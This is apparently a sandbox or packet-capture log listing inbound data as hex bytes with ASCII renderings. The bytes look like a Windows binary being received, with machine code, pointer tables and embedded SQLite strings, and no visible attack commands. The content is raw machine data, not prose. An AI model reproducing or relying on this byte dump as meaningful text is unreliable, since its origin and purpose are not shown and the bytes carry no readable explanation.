2023-11-18 09:02:42 UTC	9954	IN	Data Raw: 24 30 48 ff c8 48 03 c1 48 99 48 f7 f9 3b 83 bc 00 00 00 76 06 89 83 bc 00 00 00 89 07 33 c0 48 8b 5c 24 38 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 10 57 48 83 ec 20 48 8b d9 c7 44 24 30 00 00 00 00 48 8b 89 40 01 00 00 e8 6f 8e ff ff 48 8b 8b 40 01 00 00 48 8d 54 24 30 e8 de 8e ff ff 8b f8 85 c0 75 06 39 44 24 30 74 4a ff 83 84 00 00 00 48 8b 43 70 48 85 c0 74 13 0f 1f 00 c7 40 18 01 00 00 00 48 8b 40 40 48 85 c0 75 f0 48 8b 8b 38 01 00 00 33 d2 e8 12 4d 00 00 80 7b 1b 00 74 12 48 8b 4b 48 45 33 c0 33 d2 48 8b 01 ff 90 90 00 00 00 8b c7 48 8b 5c 24 38 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 18 48 89 54 24 10 57 48 83 ec 30 48 8b da 48 8b f9 45 85 c9 74 30 33 c0 48 8d 4c 24 48 48 85 d2 Data Ascii: $0HHHH;v3H\$8H _H\$WH HD$0H@oH@HT$0u9D$0tJHCpHt@H@@HuH83M{tHKHE33HH\$8H _H\$Ht$HT$WH0HHEt03HL$HH
2023-11-18 09:02:42 UTC	9970	IN	Data Raw: c1 75 f3 49 8b 02 48 8b 48 18 49 89 0a 41 ff 4b 38 85 db 74 32 66 41 83 79 14 00 49 8b 59 20 74 18 48 8b 43 48 49 89 41 18 48 8b 43 08 4c 89 4b 48 ff 08 48 83 c4 20 5b c3 49 8b 09 e8 a5 03 00 00 48 8b 43 08 ff 08 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc 48 8b 41 28 48 8b 51 30 48 89 42 28 48 8b 51 28 48 8b 41 30 48 89 42 30 48 8b 41 20 48 c7 41 28 00 00 00 00 ff 48 34 48 8b c1 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 48 89 7c 24 20 41 56 48 83 ec 20 8b 69 3c b8 00 01 00 00 03 ed 48 8b f9 3b e8 0f 42 e8 48 8b 01 48 8b 08 48 85 c9 74 06 ff 15 83 67 05 00 83 7f 3c 00 74 0e 48 8b 05 ce 9c 05 00 48 85 c0 74 02 ff d0 44 8b f5 33 db 49 c1 e6 03 4d 85 f6 74 1f 49 8b ce e8 f9 da 00 00 48 8b Data Ascii: uIHHIAK8t2fAyIY tHCHIAHCLKHH [IHCH [HA(HQ0HB(HQ(HA0HB0HA HA(H4HH\$Hl$Ht$H\|$ AVH i<H;BHHHtg<tHHtD3IMtIH
2023-11-18 09:02:42 UTC	9986	IN	Data Raw: 02 ff c2 41 3b d5 7e 40 48 8b cb e8 16 9a 00 00 45 33 c9 c7 44 24 20 40 b8 00 00 4c 8d 05 9c de 01 00 33 d2 8d 4a 01 e8 3a 27 00 00 4c 8b 6c 24 70 48 8b 5c 24 60 48 8b 6c 24 78 48 83 c4 30 41 5f 41 5e 41 5c 5f 5e c3 4c 8d 05 7f dc 01 00 48 8b d3 41 8b cf e8 8c 69 00 00 e9 96 00 00 00 49 8b cf 48 03 c9 e8 dc 95 00 00 48 8b e8 48 85 c0 0f 84 8f 02 00 00 48 8b d0 41 8b cf ff 15 7c 1c 05 00 48 8b cd 85 c0 75 31 e8 98 99 00 00 48 8b cb e8 90 99 00 00 ff 15 d2 1b 05 00 c7 44 24 20 a3 b8 00 00 4c 8d 05 23 de 01 00 8b d0 45 33 c9 b9 0a 19 00 00 e9 6d ff ff ff e8 67 2c 00 00 4c 8b e0 48 85 c0 0f 84 32 02 00 00 4c 8b c8 4c 8d 05 f9 db 01 00 48 8b d3 41 8b cf e8 06 69 00 00 49 8b cc e8 3e 99 00 00 48 8b cd e8 36 99 00 00 4c 8b 64 24 68 48 8b d7 48 ff c2 80 3c 13 00 Data Ascii: A;~@HE3D$ @L3J:'Ll$pH\$`Hl$xH0A_A^A\_^LHAiIHHHHA\|Hu1HD$ L#E3mg,LH2LLHAiI>H6Ld$hHH<
2023-11-18 09:02:42 UTC	10002	IN	Data Raw: 24 48 83 f9 02 73 0f 33 c0 c3 0f 1f 40 00 0f 1f 84 00 00 00 00 00 66 83 c2 f6 48 03 c9 48 83 f9 08 72 f3 eb 3e 48 81 f9 ff 00 00 00 76 19 0f 1f 84 00 00 00 00 00 66 83 c2 28 48 c1 e9 04 48 81 f9 ff 00 00 00 77 ef 48 83 f9 0f 76 16 66 0f 1f 84 00 00 00 00 00 66 83 c2 0a 48 d1 e9 48 83 f9 0f 77 f3 83 e1 07 48 8d 05 f1 9c 02 00 0f b7 04 48 66 83 e8 0a 66 03 c2 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 44 0f bf c2 66 3b ca 7c 31 0f bf d1 41 8d 40 31 3b d0 7e 04 0f b7 c1 c3 41 8d 40 1f 3b d0 7e 04 8d 41 01 c3 8b c2 41 2b c0 48 63 c8 48 8d 05 55 cb 02 00 0f b6 04 01 03 c2 c3 44 0f bf c9 41 8d 41 31 44 3b c0 7e 04 0f b7 c2 c3 41 8d 41 1f 44 3b c0 7e 04 8d 42 01 c3 41 8b c0 41 2b c1 48 63 c8 48 8d 05 20 cb 02 00 0f b6 04 01 41 03 c0 c3 cc cc cc cc cc cc cc cc cc Data Ascii: $Hs3@fHHr>Hvf(HHwHvffHHwHHffDf;\|1A@1;~A@;~AA+HcHUDAA1D;~AAD;~BAA+HcH A
2023-11-18 09:02:42 UTC	10018	IN	Data Raw: 63 f2 49 63 ca 48 98 49 03 c6 48 8d 51 0f 48 03 d0 48 83 fa 46 7e 20 48 8b 4c 24 30 e8 75 0c 00 00 48 89 44 24 58 48 8b d8 48 85 c0 0f 84 0e 0b 00 00 4c 8b 54 24 50 0f b6 54 24 20 45 85 d2 44 0f b6 5c 24 23 4c 8b e3 41 0f 9f c1 8b c2 44 0a ca 44 0a 4c 24 25 8d 0c 92 44 8d 04 4d 10 00 00 00 45 84 db 74 06 44 88 1b 48 ff c3 85 ff 79 36 c6 03 30 48 ff c3 eb 5a c6 44 24 24 02 41 8b fb e9 68 ff ff ff 44 0f b6 7c 24 20 45 33 db 41 80 fa 02 0f 85 53 ff ff ff 41 8b fb e9 4d ff ff ff 66 0f 1f 44 00 00 45 85 c0 7f 04 b0 30 eb 19 f2 0f 2c c6 41 ff c8 66 0f 6e c0 04 30 f3 0f e6 c0 f2 0f 5c f0 f2 0f 59 f7 88 03 48 ff c3 83 ef 01 79 d4 45 84 c9 74 06 c6 03 2e 48 ff c3 83 c7 01 79 1b f7 df b8 30 00 00 00 8b d7 48 8b fb 48 03 da 8b ca 44 2b d2 0f b6 54 24 20 f3 aa 45 85 Data Ascii: cIcHIHQHHF~ HL$0uHD$XHHLT$PT$ ED\$#LADDL$%DMEtDHy60HZD$$AhD\|$ E3ASAMfDE0,Afn0\YHyEt.Hy0HHD+T$ E
2023-11-18 09:02:42 UTC	10034	IN	Data Raw: b6 8c 20 70 13 17 00 41 0f b6 00 42 0f b6 84 20 70 13 17 00 3b c1 0f 85 12 04 00 00 80 7b 28 00 75 10 80 7b 2a 00 75 0a 80 7b 2b 00 0f 84 fc 03 00 00 48 8b cb e8 ec 07 00 00 66 89 6b 2b 48 c7 43 14 00 00 00 00 48 c7 43 20 00 00 00 00 66 c7 43 28 00 00 48 83 c7 09 0f 84 d0 03 00 00 4c 8d 0d d5 0a 01 00 48 8b d7 4c 2b cf 66 66 66 0f 1f 84 00 00 00 00 00 0f b6 02 46 0f b6 04 0a 41 3b c0 75 09 85 c0 74 43 48 ff c2 eb ea 42 0f b6 8c 20 70 13 17 00 43 0f b6 84 20 70 13 17 00 3b c8 75 05 48 ff c2 eb cf 4c 8d 0d 94 0a 01 00 48 8b d7 4c 2b cf 66 90 0f b6 02 46 0f b6 04 0a 41 3b c0 75 1c 85 c0 75 2e 89 6b 0c 89 6b 10 33 ed 8b c5 48 81 c4 90 00 00 00 41 5c 5f 5e 5d 5b c3 42 0f b6 8c 20 70 13 17 00 43 0f b6 84 20 70 13 17 00 3b c8 75 05 48 ff c2 eb bc 4c 8d 05 35 0a Data Ascii: pAB p;{(u{*u{+Hfk+HCHC fC(HLHL+fffFA;utCHB pC p;uHLHL+fFA;uu.kk3HA\_^][B pC p;uHL5
2023-11-18 09:02:42 UTC	10050	IN	Data Raw: 00 00 c6 59 e4 3f 00 00 00 00 72 6e e4 3f 00 00 00 00 0a 83 e4 3f 00 00 00 00 8f 97 e4 3f 00 00 00 00 00 ac e4 3f 00 00 00 00 5e c0 e4 3f 00 00 00 00 a8 d4 e4 3f 00 00 00 00 de e8 e4 3f 00 00 00 00 01 fd e4 3f 00 00 00 00 10 11 e5 3f 00 00 00 00 0c 25 e5 3f 00 00 00 00 f5 38 e5 3f 00 00 00 00 ca 4c e5 3f 00 00 00 00 8d 60 e5 3f 00 00 00 00 3c 74 e5 3f 00 00 00 00 d8 87 e5 3f 00 00 00 00 60 9b e5 3f 00 00 00 00 d6 ae e5 3f 00 00 00 00 39 c2 e5 3f 00 00 00 00 89 d5 e5 3f 00 00 00 00 c6 e8 e5 3f 00 00 00 00 f0 fb e5 3f 00 00 00 00 08 0f e6 3f 00 00 00 00 0d 22 e6 3f 00 00 00 00 ff 34 e6 3f 00 00 00 00 de 47 e6 3f 00 00 00 00 ab 5a e6 3f 00 00 00 00 66 6d e6 3f 00 00 00 00 0e 80 e6 3f 00 00 00 00 a4 92 e6 3f 00 00 00 00 27 a5 e6 3f 00 00 00 00 98 b7 e6 3f 00 Data Ascii: Y?rn????^?????%?8?L?`?<t??`??9?????"?4?G?Z?fm???'??
2023-11-18 09:02:42 UTC	10066	IN	Data Raw: 15 80 01 00 00 00 20 84 15 80 01 00 00 00 30 84 15 80 01 00 00 00 48 84 15 80 01 00 00 00 50 84 15 80 01 00 00 00 58 84 15 80 01 00 00 00 60 84 15 80 01 00 00 00 68 84 15 80 01 00 00 00 70 84 15 80 01 00 00 00 78 84 15 80 01 00 00 00 80 84 15 80 01 00 00 00 88 84 15 80 01 00 00 00 90 84 15 80 01 00 00 00 98 84 15 80 01 00 00 00 a0 84 15 80 01 00 00 00 a8 84 15 80 01 00 00 00 b8 84 15 80 01 00 00 00 d0 84 15 80 01 00 00 00 e0 84 15 80 01 00 00 00 68 84 15 80 01 00 00 00 f0 84 15 80 01 00 00 00 00 85 15 80 01 00 00 00 10 85 15 80 01 00 00 00 20 85 15 80 01 00 00 00 38 85 15 80 01 00 00 00 48 85 15 80 01 00 00 00 60 85 15 80 01 00 00 00 74 85 15 80 01 00 00 00 7c 85 15 80 01 00 00 00 88 85 15 80 01 00 00 00 a0 85 15 80 01 00 00 00 c8 85 15 80 01 00 00 00 e0 Data Ascii: 0HPX`hpxh 8H`t\|
2023-11-18 09:02:42 UTC	10082	IN	Data Raw: 00 00 00 00 00 00 18 cf 15 80 01 00 00 00 45 00 00 00 00 00 00 00 58 b3 15 80 01 00 00 00 04 00 00 00 00 00 00 00 28 cf 15 80 01 00 00 00 47 00 00 00 00 00 00 00 38 cf 15 80 01 00 00 00 87 00 00 00 00 00 00 00 60 b3 15 80 01 00 00 00 05 00 00 00 00 00 00 00 48 cf 15 80 01 00 00 00 48 00 00 00 00 00 00 00 68 b3 15 80 01 00 00 00 06 00 00 00 00 00 00 00 58 cf 15 80 01 00 00 00 a2 00 00 00 00 00 00 00 68 cf 15 80 01 00 00 00 91 00 00 00 00 00 00 00 78 cf 15 80 01 00 00 00 49 00 00 00 00 00 00 00 88 cf 15 80 01 00 00 00 b3 00 00 00 00 00 00 00 98 cf 15 80 01 00 00 00 ab 00 00 00 00 00 00 00 40 b5 15 80 01 00 00 00 41 00 00 00 00 00 00 00 a8 cf 15 80 01 00 00 00 8b 00 00 00 00 00 00 00 70 b3 15 80 01 00 00 00 07 00 00 00 00 00 00 00 b8 cf 15 80 01 00 00 00 4a Data Ascii: EX(G8`HHhXhxI@ApJ
2023-11-18 09:02:42 UTC	10098	IN	Data Raw: 58 5f 54 52 49 47 47 45 52 5f 44 45 50 54 48 3d 31 30 30 30 00 00 4d 41 58 5f 56 41 52 49 41 42 4c 45 5f 4e 55 4d 42 45 52 3d 33 32 37 36 36 00 00 00 00 00 00 00 4d 41 58 5f 56 44 42 45 5f 4f 50 3d 32 35 30 30 30 30 30 30 30 00 00 00 4d 41 58 5f 57 4f 52 4b 45 52 5f 54 48 52 45 41 44 53 3d 38 00 00 00 00 4d 55 54 45 58 5f 57 33 32 00 00 00 00 00 00 00 53 4f 55 4e 44 45 58 00 54 45 4d 50 5f 53 54 4f 52 45 3d 31 00 00 00 00 54 48 52 45 41 44 53 41 46 45 3d 31 00 00 00 00 55 53 45 5f 55 52 49 00 57 49 4e 33 32 5f 4d 41 4c 4c 4f 43 00 00 00 00 41 4e 59 00 42 4c 4f 42 00 00 00 00 49 4e 54 00 49 4e 54 45 47 45 52 00 52 45 41 4c 00 00 00 00 54 45 58 54 00 00 00 00 32 30 62 3a 32 30 65 00 32 30 63 3a 32 30 65 00 32 30 65 00 00 00 00 00 34 30 66 2d 32 31 61 2d 32 Data Ascii: X_TRIGGER_DEPTH=1000MAX_VARIABLE_NUMBER=32766MAX_VDBE_OP=250000000MAX_WORKER_THREADS=8MUTEX_W32SOUNDEXTEMP_STORE=1THREADSAFE=1USE_URIWIN32_MALLOCANYBLOBINTINTEGERREALTEXT20b:20e20c:20e20e40f-21a-2
2023-11-18 09:02:42 UTC	10114	IN	Data Raw: 72 65 69 67 6e 20 6b 65 79 20 6f 6e 20 25 73 20 73 68 6f 75 6c 64 20 72 65 66 65 72 65 6e 63 65 20 6f 6e 6c 79 20 6f 6e 65 20 63 6f 6c 75 6d 6e 20 6f 66 20 74 61 62 6c 65 20 25 54 00 00 00 00 00 00 00 00 00 00 6e 75 6d 62 65 72 20 6f 66 20 63 6f 6c 75 6d 6e 73 20 69 6e 20 66 6f 72 65 69 67 6e 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 6d 61 74 63 68 20 74 68 65 20 6e 75 6d 62 65 72 20 6f 66 20 63 6f 6c 75 6d 6e 73 20 69 6e 20 74 68 65 20 72 65 66 65 72 65 6e 63 65 64 20 74 61 62 6c 65 00 00 00 75 6e 6b 6e 6f 77 6e 20 63 6f 6c 75 6d 6e 20 22 25 73 22 20 69 6e 20 66 6f 72 65 69 67 6e 20 6b 65 79 20 64 65 66 69 6e 69 74 69 6f 6e 00 00 00 46 49 52 53 54 00 00 00 4c 41 53 54 00 00 00 00 75 6e 73 75 70 70 6f 72 74 65 64 20 75 73 65 20 6f 66 20 4e 55 4c 4c 53 20 Data Ascii: reign key on %s should reference only one column of table %Tnumber of columns in foreign key does not match the number of columns in the referenced tableunknown column "%s" in foreign key definitionFIRSTLASTunsupported use of NULLS
2023-11-18 09:02:42 UTC	10130	IN	Data Raw: 75 65 20 46 52 4f 4d 20 25 51 2e 27 25 71 5f 73 74 61 74 27 20 57 48 45 52 45 20 69 64 3d 3f 00 00 00 00 00 00 00 52 45 50 4c 41 43 45 20 49 4e 54 4f 20 25 51 2e 27 25 71 5f 73 74 61 74 27 20 56 41 4c 55 45 53 28 3f 2c 3f 29 00 00 00 44 45 4c 45 54 45 20 46 52 4f 4d 20 25 51 2e 27 25 71 5f 73 65 67 64 69 72 27 20 57 48 45 52 45 20 6c 65 76 65 6c 20 42 45 54 57 45 45 4e 20 3f 20 41 4e 44 20 3f 00 00 53 45 4c 45 43 54 20 3f 20 55 4e 49 4f 4e 20 53 45 4c 45 43 54 20 6c 65 76 65 6c 20 2f 20 28 31 30 32 34 20 2a 20 3f 29 20 46 52 4f 4d 20 25 51 2e 27 25 71 5f 73 65 67 64 69 72 27 00 00 00 00 53 45 4c 45 43 54 20 6c 65 76 65 6c 2c 20 63 6f 75 6e 74 28 2a 29 20 41 53 20 63 6e 74 20 46 52 4f 4d 20 25 51 2e 27 25 71 5f 73 65 67 64 69 72 27 20 20 20 47 52 4f 55 50 Data Ascii: ue FROM %Q.'%q_stat' WHERE id=?REPLACE INTO %Q.'%q_stat' VALUES(?,?)DELETE FROM %Q.'%q_segdir' WHERE level BETWEEN ? AND ?SELECT ? UNION SELECT level / (1024 * ?) FROM %Q.'%q_segdir'SELECT level, count(*) AS cnt FROM %Q.'%q_segdir' GROUP
2023-11-18 09:02:42 UTC	10146	IN	Data Raw: 1e 01 85 08 27 00 65 03 46 02 98 00 86 01 d8 01 a6 00 f8 00 26 00 38 00 26 00 38 02 0c 0e 9e 00 26 00 38 00 5e 00 26 00 65 00 35 00 58 00 29 00 35 00 69 00 29 00 49 00 25 00 29 02 29 01 65 04 5e 00 25 00 69 00 65 00 1e 03 85 00 5e 00 39 00 7e 00 5e 00 25 00 69 06 05 06 5e 04 3a 00 ac 00 4b 00 fe 06 de 01 25 00 1e 0b c9 04 26 00 d5 00 e5 04 35 00 31 00 37 00 ac 05 31 00 2c 00 35 00 4c 00 35 00 4c 00 35 00 2c 00 67 03 67 00 55 00 a2 00 79 00 55 00 37 00 55 00 5a 00 6c 01 35 00 55 00 07 04 26 00 47 01 ac 02 4d 01 95 00 47 00 2c 00 67 0c 35 00 27 00 ec 00 22 00 3a 00 cc 00 46 00 4c 00 3a 00 8c 00 47 00 4d 01 67 00 5a 00 27 00 d5 01 22 00 27 00 2c 00 c7 03 6c 03 27 0b 6c 01 27 00 4d 01 27 04 2c 01 46 00 3a 00 75 00 26 00 c7 02 8c 00 26 00 2c 01 26 00 6c 00 26 Data Ascii: 'eF&8&8&8^&e5X)5i)I%))e^%ie^9~^%i^:K%&5171,5L5L5,ggUyU7UZl5U&GMG,g5'":FL:GMgZ'"',l'l'M',F:u&&,&l&
2023-11-18 09:02:42 UTC	10162	IN	Data Raw: 7e fc 47 3d 3d 7a ac 64 64 c8 e7 5d 5d ba 2b 19 19 32 95 73 73 e6 a0 60 60 c0 98 81 81 19 d1 4f 4f 9e 7f dc dc a3 66 22 22 44 7e 2a 2a 54 ab 90 90 3b 83 88 88 0b ca 46 46 8c 29 ee ee c7 d3 b8 b8 6b 3c 14 14 28 79 de de a7 e2 5e 5e bc 1d 0b 0b 16 76 db db ad 3b e0 e0 db 56 32 32 64 4e 3a 3a 74 1e 0a 0a 14 db 49 49 92 0a 06 06 0c 6c 24 24 48 e4 5c 5c b8 5d c2 c2 9f 6e d3 d3 bd ef ac ac 43 a6 62 62 c4 a8 91 91 39 a4 95 95 31 37 e4 e4 d3 8b 79 79 f2 32 e7 e7 d5 43 c8 c8 8b 59 37 37 6e b7 6d 6d da 8c 8d 8d 01 64 d5 d5 b1 d2 4e 4e 9c e0 a9 a9 49 b4 6c 6c d8 fa 56 56 ac 07 f4 f4 f3 25 ea ea cf af 65 65 ca 8e 7a 7a f4 e9 ae ae 47 18 08 08 10 d5 ba ba 6f 88 78 78 f0 6f 25 25 4a 72 2e 2e 5c 24 1c 1c 38 f1 a6 a6 57 c7 b4 b4 73 51 c6 c6 97 23 e8 e8 cb 7c dd dd a1 9c Data Ascii: ~G==zdd]]+2ss``OOf""D~**T;FF)k<(y^^v;V22dN::tIIl$$H\\]nCbb917yy2CY77nmmdNNIllVV%eezzGoxxo%%Jr..\$8WsQ#\|
2023-11-18 09:02:42 UTC	10178	IN	Data Raw: ba 00 e6 01 ed 00 01 04 bf 05 d5 05 ec 01 0c 01 ef 00 6a 00 6a 00 be 00 ef 01 95 01 f0 00 54 01 6b 00 58 01 bf 01 3a 02 39 02 e2 04 f1 00 f7 03 01 04 01 02 1b 05 b2 01 5b 00 1a 05 6a 00 6a 00 12 05 71 03 19 05 d7 00 42 06 6b 00 fd 04 bf 01 3a 02 39 02 41 06 96 01 f7 03 fc 04 66 01 fb 04 40 06 22 06 b4 01 b5 01 2b 01 11 05 0a 02 f7 03 f7 03 f9 03 fa 03 1b 00 2c 01 11 02 5f 00 6c 01 fe 00 44 05 70 01 ff 00 14 06 b8 01 0a 00 13 06 7f 01 b1 05 66 00 61 00 f7 03 f7 03 f9 03 fa 03 1b 00 30 01 14 02 22 00 3c 02 9d 04 07 01 09 01 45 05 32 05 0a 01 c9 00 72 01 7d 01 43 05 74 01 31 05 42 05 76 01 5c 05 83 01 84 01 5b 05 3d 02 dd 04 d8 04 9f 00 e5 05 e6 05 e4 05 e3 05 a0 00 8e 00 29 01 d3 00 d4 00 4e 00 42 03 c0 01 cb 00 34 01 a1 00 de 00 3d 04 8b 00 3b 04 3c 01 ae Data Ascii: jjTkX:9[jjqBk:9Af@"+,_lDpfa0"<E2r}Ct1Bv\[=)NB4=;<
2023-11-18 09:02:42 UTC	10194	IN	Data Raw: 05 00 13 68 06 00 04 e2 00 00 00 00 00 00 01 19 06 00 19 78 0a 00 10 68 09 00 07 01 1b 00 01 0a 01 00 0a a2 00 00 01 3d 08 00 3d 88 05 00 34 78 06 00 18 68 07 00 09 f2 02 30 01 0a 04 00 0a 34 08 00 0a 52 06 70 01 1a 06 00 1a 88 02 00 11 78 03 00 0d 72 09 30 01 19 0a 00 19 74 09 00 19 64 08 00 19 54 07 00 19 34 06 00 19 32 15 e0 19 19 0a 00 19 e4 09 00 19 74 08 00 19 64 07 00 19 34 06 00 19 32 15 f0 68 26 00 00 02 00 00 00 cb b9 00 00 29 ba 00 00 ff 11 15 00 68 ba 00 00 af b9 00 00 6e ba 00 00 1a 12 15 00 00 00 00 00 01 13 08 00 13 34 0c 00 13 52 0c f0 0a e0 08 70 07 60 06 50 01 0f 04 00 0f 34 06 00 0f 32 0b 70 01 18 0a 00 18 64 0c 00 18 54 0b 00 18 34 0a 00 18 52 14 f0 12 e0 10 70 01 0f 06 00 0f 54 0b 00 0f 34 0a 00 0f 72 0b 60 01 12 02 00 12 72 0b 50 01 Data Ascii: hxh==4xh04Rpxr0tdT42td42h&)hn4Rp`P42pdT4RpT4r`rP
2023-11-18 09:02:42 UTC	10210	IN	Data Raw: 09 00 0d 34 0b 00 0d 32 09 f0 07 70 06 60 01 16 06 00 16 52 12 f0 10 e0 0e c0 0c 60 0b 50 21 0c 04 00 0c 74 05 00 05 34 0d 00 e0 d4 03 00 2c d5 03 00 38 c1 17 00 21 05 02 00 05 d4 04 00 2c d5 03 00 41 d5 03 00 48 c1 17 00 21 00 00 00 2c d5 03 00 41 d5 03 00 48 c1 17 00 21 00 02 00 00 74 05 00 e0 d4 03 00 2c d5 03 00 38 c1 17 00 21 00 02 00 00 74 05 00 e0 d4 03 00 2c d5 03 00 38 c1 17 00 21 00 00 00 e0 d4 03 00 2c d5 03 00 38 c1 17 00 01 22 08 00 22 74 05 00 10 64 04 00 08 34 06 00 08 e0 06 50 01 1e 0a 00 1e 34 0f 00 1e 52 1a f0 18 e0 16 d0 14 c0 12 70 11 60 10 50 01 08 03 00 08 42 04 f0 02 30 00 00 21 10 04 00 10 74 0a 00 05 64 09 00 90 dc 03 00 ab dc 03 00 e8 c1 17 00 21 05 02 00 05 e4 04 00 ab dc 03 00 f9 dc 03 00 f4 c1 17 00 21 05 02 00 05 54 08 00 f9 Data Ascii: 42p`R`P!t4,8!,AH!,AH!t,8!t,8!,8""td4P4Rp`PB0!td!!T
2023-11-18 09:02:42 UTC	10226	IN	Data Raw: 18 00 21 00 00 00 a0 8b 06 00 b7 8b 06 00 08 01 18 00 01 0a 04 00 0a 34 06 00 0a 32 06 70 01 0a 04 00 0a 34 06 00 0a 32 06 70 19 23 0a 00 14 34 12 00 14 72 10 f0 0e e0 0c d0 0a c0 08 70 07 60 06 50 60 8b 01 00 38 00 00 00 19 1e 07 00 0f 01 14 00 08 f0 06 e0 04 70 03 60 02 50 00 00 60 8b 01 00 78 00 00 00 21 25 08 00 25 68 08 00 1d d4 12 00 15 c4 13 00 08 34 1c 00 f0 8f 06 00 50 90 06 00 74 01 18 00 21 00 00 00 f0 8f 06 00 50 90 06 00 74 01 18 00 19 13 01 00 04 c2 00 00 60 8b 01 00 50 00 00 00 19 83 0a 00 83 e4 14 00 78 c4 12 00 0b b2 07 f0 05 70 04 60 03 50 02 30 60 8b 01 00 50 00 00 00 01 19 0a 00 19 34 11 00 19 52 15 f0 13 e0 11 d0 0f c0 0d 70 0c 60 0b 50 01 0f 06 00 0f 64 08 00 0f 34 07 00 0f 32 0b 70 21 05 02 00 05 54 06 00 40 9e 06 00 c3 9e 06 00 08 Data Ascii: !42p42p#4rp`P`8p`P`x!%%h4Pt!Pt`Pxp`P0`P4Rp`Pd42p!T@
2023-11-18 09:02:42 UTC	10239	IN	Data Raw: 08 00 9a 74 08 00 0f 54 0a 00 0f 34 09 00 0f 52 0b 60 01 14 08 00 14 64 0a 00 14 54 09 00 14 34 08 00 14 52 10 70 01 9a 08 00 9a 74 08 00 0f 54 0a 00 0f 34 09 00 0f 52 0b 60 01 0f 06 00 0f 64 11 00 0f 34 10 00 0f b2 0b 70 21 0a 04 00 0a e4 0f 00 05 54 0e 00 90 06 09 00 36 07 09 00 54 35 18 00 21 00 02 00 00 e4 0f 00 90 06 09 00 36 07 09 00 54 35 18 00 21 00 02 00 00 e4 0f 00 90 06 09 00 36 07 09 00 54 35 18 00 01 0a 04 00 0a 34 08 00 0a 52 06 70 01 b4 0a 00 b4 64 0e 00 15 74 11 00 15 54 10 00 15 34 0f 00 15 b2 11 e0 01 07 01 00 07 c2 00 00 01 07 01 00 07 c2 00 00 01 07 01 00 07 c2 00 00 01 12 07 00 12 c2 0e f0 0c d0 0a c0 08 70 07 50 06 30 00 00 21 0d 04 00 0d e4 0c 00 08 64 16 00 00 0b 09 00 a1 0b 09 00 e0 35 18 00 21 00 00 00 00 0b 09 00 a1 0b 09 00 e0 Data Ascii: tT4R`dT4RptT4R`d4p!T6T5!6T5!6T54RpdtT4pP0!d5!
2023-11-18 09:02:42 UTC	10255	IN	Data Raw: 09 00 05 34 0e 00 00 33 0d 00 1f 33 0d 00 00 75 18 00 21 05 02 00 05 c4 07 00 1f 33 0d 00 27 34 0d 00 0c 75 18 00 21 00 00 00 1f 33 0d 00 27 34 0d 00 0c 75 18 00 21 00 00 00 00 33 0d 00 1f 33 0d 00 00 75 18 00 01 18 07 00 18 62 14 f0 12 d0 10 c0 0e 70 0d 60 0c 30 00 00 21 04 02 00 04 54 11 00 b0 35 0d 00 eb 35 0d 00 60 75 18 00 21 04 02 00 04 e4 06 00 eb 35 0d 00 03 36 0d 00 74 75 18 00 21 00 00 00 eb 35 0d 00 03 36 0d 00 74 75 18 00 21 00 00 00 b0 35 0d 00 eb 35 0d 00 60 75 18 00 01 07 03 00 07 62 03 70 02 60 00 00 21 05 02 00 05 34 0a 00 f0 38 0d 00 fe 38 0d 00 bc 75 18 00 21 3f 08 00 3f 54 0b 00 15 f4 06 00 0d e4 0d 00 05 c4 0c 00 fe 38 0d 00 07 39 0d 00 c8 75 18 00 21 00 02 00 00 e4 0d 00 fe 38 0d 00 07 39 0d 00 c8 75 18 00 21 00 00 00 fe 38 0d 00 07 Data Ascii: 433u!3'4u!3'4u!33ubp`0!T55`u!56tu!56tu!55`ubp`!488u!??T89u!89u!8
2023-11-18 09:02:42 UTC	10271	IN	Data Raw: 10 00 00 b5 18 00 21 4c 0a 00 4c f4 08 00 47 e4 09 00 3b 74 0b 00 32 34 10 00 00 c4 0a 00 00 61 10 00 39 61 10 00 00 b5 18 00 21 00 0a 00 00 f4 08 00 00 e4 09 00 00 c4 0a 00 00 74 0b 00 00 34 10 00 00 61 10 00 39 61 10 00 00 b5 18 00 01 04 01 00 04 62 00 00 01 19 0a 00 19 74 11 00 19 64 10 00 19 54 0f 00 19 34 0e 00 19 b2 15 e0 01 14 08 00 14 74 04 00 0f 64 03 00 0a 54 02 00 05 34 01 00 19 21 07 00 0f 34 20 00 0f 01 1a 00 08 70 07 60 06 50 00 00 60 8b 01 00 c0 00 00 00 01 04 01 00 04 42 00 00 01 06 02 00 06 32 02 30 01 0f 06 00 0f 64 07 00 0f 34 06 00 0f 32 0b 70 01 27 0a 00 27 01 11 00 20 f0 1e e0 1c d0 1a c0 18 70 17 60 16 50 15 30 01 07 04 00 07 54 06 00 07 70 06 60 21 14 04 00 14 e4 05 00 05 34 04 00 b0 83 10 00 d3 83 10 00 f0 b5 18 00 21 00 04 00 00 Data Ascii: !LLG;t24a9a!t4a9abtdT4tdT4!4 p`P`B20d42p'' p`P0Tp`!4!
2023-11-18 09:02:42 UTC	10287	IN	Data Raw: 01 00 04 62 00 00 01 04 01 00 04 42 00 00 01 72 07 00 72 34 0e 00 0b 82 07 d0 05 c0 03 70 02 50 00 00 21 0a 04 00 0a e4 07 00 05 64 08 00 50 b3 13 00 c6 b3 13 00 28 f5 18 00 21 05 02 00 05 f4 06 00 c6 b3 13 00 30 b4 13 00 3c f5 18 00 21 00 00 00 c6 b3 13 00 30 b4 13 00 3c f5 18 00 21 00 02 00 00 e4 07 00 50 b3 13 00 c6 b3 13 00 28 f5 18 00 01 06 02 00 06 32 02 30 01 0a 04 00 0a 34 07 00 0a 32 06 70 01 0a 04 00 0a 34 07 00 0a 32 06 70 01 14 06 00 14 64 0a 00 14 34 08 00 14 52 10 70 01 0a 04 00 0a 34 07 00 0a 32 06 60 21 05 02 00 05 74 06 00 00 b9 13 00 35 b9 13 00 bc f5 18 00 21 00 00 00 00 b9 13 00 35 b9 13 00 bc f5 18 00 01 0f 06 00 0f 64 07 00 0f 34 06 00 0f 32 0b 70 01 14 08 00 14 64 09 00 14 54 08 00 14 34 07 00 14 32 10 70 01 0e 04 00 0e d2 0a f0 08 Data Ascii: bBrr4pP!dP(!0<!0<!P(2042p42pd4Rp42`!t5!5d42pdT42p
